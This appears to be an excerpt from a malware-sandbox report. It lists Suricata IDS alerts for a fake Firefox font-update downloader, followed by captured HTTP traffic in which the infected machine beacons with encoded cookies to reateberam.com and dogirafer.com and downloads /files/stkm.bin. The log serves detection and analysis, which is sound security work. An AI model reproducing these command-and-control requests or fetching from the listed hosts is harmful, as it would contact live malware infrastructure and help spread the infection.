Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50027 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50032 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50035 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50036 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50037 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50038 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50033 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50034 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50040 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50039 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50042 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50043 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50048 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50045 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50050 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50051 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50041 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50053 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50054 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50055 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50047 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50044 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50049 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50046 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50052 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49891 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49914 -> 104.21.16.251:443

Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 92Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hndViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hldViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hidViRxTPtzXdZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 360Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hjdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hgdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hhdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hudViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hvdViRxTPtzGAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 12228Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnawqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkawqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
